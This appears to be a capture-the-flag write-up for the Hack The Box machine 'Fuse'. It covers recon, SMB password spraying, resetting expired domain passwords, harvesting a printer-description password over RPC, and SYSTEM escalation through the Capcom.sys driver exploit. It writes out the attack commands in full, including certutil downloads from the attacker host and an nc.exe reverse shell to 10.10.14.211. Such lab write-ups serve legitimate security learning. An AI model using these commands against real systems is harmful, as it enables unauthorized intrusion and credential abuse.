Box Information

Recon

nmap -sC -sV -T4 -p- 10.10.10.193 -oA scans/nmap.full

[sudo] password for matesz:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 21:00 CEST
Nmap scan report for 10.10.10.193
Host is up (0.043s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-13 19:18:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc        Microsoft Windows RPC
49680/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
49764/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/13%Time=5F0CAFB1%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h36m16s, deviation: 4h02m30s, median: 16m15s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-07-13T12:20:39-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-07-13T19:20:40
|_  start_date: 2020-07-13T15:17:55

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 392.47 seconds

nmap -sU 10.10.10.193 -oA scans/nmap.udp

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 21:10 CEST
Nmap scan report for 10.10.10.193
Host is up (0.044s latency).
Not shown: 997 open|filtered ports
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 16.00 seconds

http - 80 TCP

http://10.10.10.193 automatically redirected me to http://fuse.fabricorp.local/papercut/logs/html/index.htm so I added fuse.fabricorp.local to my /etc/hosts file.

10.10.10.193 fuse.fabricorp.local

I refresed and got the page:

• Papercut print logger was running
• There were Usernames on the page (When I clicked on a date)

Making wordlists

I saved all the usernames in a file users.lst.

pmerton
tlavel
sthompson
bhult
administrator

I also used cewl to make a wordlist of the words used on the page in order to get a possible list of passwords.

cewl --with-numbers -d 3 -m 3 -w pagewords.lst http://fuse.fabricorp.local/papercut/logs/html/index.htm

pagewords.lst

smb - 445 TCP

Bruting the creds

I used crackmapexec to brute force smb logins with the wordlists I got from the page.

I saved the output to a file with tee:

crackmapexec smb 10.10.10.193 -u users.lst -p pagewords.lst | tee scans/cme_smb.out

I grepped out the STATUS_LOGON_FAILURE string from the file:

grep -v 'STATUS_LOGON_FAILURE' scans/cme_smb.out
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE

• There were 2 entries with STATUS_PASSWORD_MUST_CHANGE
• This meant I could change their password then I could easily login through smb with the custom password I set up

Changing the passwords

I used smbpasswd in order to change the passwords on smb.

man smbpasswd

I generated a random very strong password(with bitwarden) to pass all the security checks.

8rGtpb8u9G23#!xmBdXWZWXr6CwFE&v7

smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel

I changed the other one (bhult) too.

• There were nothing interesting in samba

rpc - 135 TCP

I used my newly reseted password to login with rpcclient.

• Note: The password automatically resets after some time.

rpcclient -U 'bhult' 10.10.10.193
Enter WORKGROUP\bhult's password:
rpcclient $>

I started rpc enumeration.

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

• I made a new file users2.lst with this userlist.

users2.lst:

Administrator
Guest
krbtgt
DefaultAccount
svc-print
bnielson
sthompson
tlavel
pmerton
svc-scan
bhult
dandrews
mberbatov
astein
dmuir

I also ran other enum* commands but only enumprinters gave me a results that caught my attention:

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

• There was a password! $fab@s3Rv1ce$1

Since I had a userlist I tried to brute the username with crackmapexec.

Foothold

Crackmapexec to brute username

I used crackmapexec with my users2.lst wordlist and the new password $fab@s3Rv1ce$1.

crackmapexec smb 10.10.10.193 -u users2.lst -p '$fab@s3Rv1ce$1'

SMB         10.10.10.193    445    FUSE             [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1

• There were only one valid user on smb svc-print:$fab@s3Rv1ce$1

I also tried crackmapexec with the winrm option.

crackmapexec winrm 10.10.10.193 -u users2.lst -p '$fab@s3Rv1ce$1' --continue-on-success | tee scans/cme_winrm_printerpass.out

• Note: I used tee to save the command’s output to a file.

WINRM       10.10.10.193    5985   FUSE             [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)

• The same creds worked on winrm

Login with evil-winrm

I used evil-winrm in order to get a shell on the box.

evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'

• I have successfully logged in with evil-winrm
• I also had access to type(same as cat but on windows) out the user flag
  (C:\Users\svc-print\Desktop\user.txt:7fe9e----------------------65fd4)

Privilege Escalation from svc-print

Enumeration

*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

• SeLoadDriverPrivilege seemed interesting!

Searching for exploits

I used the awesome windows privesc checklist from book.hacktricks.xyz/windows/checklist-windows-privilege-escalation.
I looked up the groups section which led me to Privileged Accounts & Tokens page which had the SeLoadDriverPrivilege.
And this mentioned the original blog.

Exploit PoC’s:

https://github.com/TarlogicSecurity/EoPLoadDriver/

https://github.com/tandasat/ExploitCapcom

These were all sources which I couldn’t compile so I started looking up the forks of the repos for releases.
After some time I found some!
COMPILED EXE files:
https://github.com/umiterkol/EoPLoadDriver_Release/releases
https://github.com/clubby789/ExploitCapcom/releases

Capcom.sys (from book.hacktricks.xyz)

Exploitation

1. I downloaded the exe from https://github.com/clubby789/ExploitCapcom/releases/download/1.0/ExploitCapcom.exe

   • Alternative download from my page: ExploitCapcom.exe

2. I copied the exploit to the box https://lolbas-project.github.io/lolbas/Binaries/Certutil/#download

   *Evil-WinRM* PS C:\tmp> certutil.exe -urlcache -split -f http://10.10.14.211/ExploitCapcom.exe explcc.exe
   ****  Online  ****
     000000  ...
     047000
   CertUtil: -URLCache command completed successfully.
   

3. I executed it without any argument

   *Evil-WinRM* PS C:\tmp> ./explcc.exe
   USAGE: 000002340C2C8ED0<LOAD/EXPLOIT> '<PATH/COMMAND>'
   LOAD will load the vulnerable driver at PATH, EXPLOIT will run COMMAND
   

4. (not needed) I downloaded Capcom.sys

   • Alternative download from my page: Capcom.sys

   I copied to the box:

   certutil.exe -urlcache -split -f http://10.10.14.211/Capcom.sys capcom.sys
   

5. (not needed) I executed the exploit with LOAD and PATH

   ./explcc.exe LOAD capcom.sys
   

6. I executed the exploit with EXPLOIT and COMMAND

   *Evil-WinRM* PS C:\tmp> ./explcc.exe EXPLOIT whoami
   [*] Capcom.sys exploit
   [*] Capcom.sys handle was obtained as 0000000000000064
   [*] Shellcode was placed at 00000141B0320008
   [+] Shellcode was executed
   [+] Token stealing was successful
   [+] Command Executed
   nt authority\system
   

Getting a reverse shell back

I used evil-winrm’s builtin upload function to upload nc.exe from my kali box.

*Evil-WinRM* PS C:\tmp> upload /usr/share/windows-resources/binaries/nc.exe

Then I ran the exploit with an nc reverse shell payload while I was listening with nc on my kali box:

*Evil-WinRM* PS C:\tmp> ./explcc.exe EXPLOIT "nc.exe -e cmd.exe 10.10.14.211 1337"
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001D8B2390008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed

• It hanged

My nc -lvnp 1337:

nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.211] from (UNKNOWN) [10.10.10.193] 51519
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\tmp>whoami
whoami
nt authority\system

• Since I was nt authority\system I had access to the root flag
  (C:\Users\Administrator\Desktop\root.txt:e920f----------------------c0573)